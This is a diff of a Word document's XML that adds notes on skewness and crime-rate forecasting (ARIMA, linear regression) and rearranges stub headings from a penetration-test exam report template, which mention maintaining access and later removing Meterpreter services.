+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Left Skewness:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4850ABC5" wp14:editId="71B788BC">
+            <wp:extent cx="3300773" cy="1420586"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="1561269254" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1561269254" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3305862" cy="1422776"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A99C1D2" wp14:editId="57AD76C5">
+            <wp:extent cx="4029075" cy="1295400"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="66299470" name="Picture 1" descr="A white rectangular object with black text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="66299470" name="Picture 1" descr="A white rectangular object with black text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4029075" cy="1295400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Forecasting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t>For forecasting the quantity of crimes and the crime rate, Its necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which model can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>We</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> use for this</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t></w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  Autoregressive Integrated Moving Average (ARIMA):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Suitable for univariate time series data with clear trend and seasonality.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Captures past values and forecasting errors to make predictions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Effective for short-term predictions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Linear regression:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Linear regression is a simple but powerful model that can be used to predict continuous variables, such as population growth. It works by finding a linear relationship between the population growth and one or more independent variables, such as fertility rates, mortality rates, and migration rates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc59959353"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.0 </w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>Programming for Data Analytics</w:t>
-      </w:r>
+        <w:t xml:space="preserve">3.1 Sample Report </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>– Information Gathering</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11058,19 +11785,253 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc59959353"/>
-      <w:r>
+      <w:bookmarkStart w:id="7" w:name="_Toc59959354"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>3.2 Sample Report – Service Enumeration</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9356" w:type="dxa"/>
+        <w:tblInd w:w="-10" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+        </w:tblBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="CED7E7"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9356"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="11234"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9356" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="80" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve">The </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc59959356"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>3.4 Sample Report – Maintaining Access</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc59959357"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.5 Sample Report </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>– House Cleaning</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc59959358"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.0 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Programing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="558AC930" wp14:editId="4EBFD20B">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="7CE64B57">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>-952</wp:posOffset>
+              <wp:posOffset>0</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>-1270</wp:posOffset>
+              <wp:posOffset>269240</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="4524693" cy="2266102"/>
             <wp:effectExtent l="0" t="0" r="0" b="1270"/>
@@ -11087,7 +12048,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25" cstate="print">
+                    <a:blip r:embed="rId33" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11113,540 +12074,12 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>– Information Gathering</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc59959354"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>3.2 Sample Report – Service Enumeration</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The service enumeration portion of a penetration test focuses on gathering information about </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>what</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc59959355"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>3.3 Sample Report – Penetration</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The penetration testing portions of the assessment focus heavily on gaining access to a variety of </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
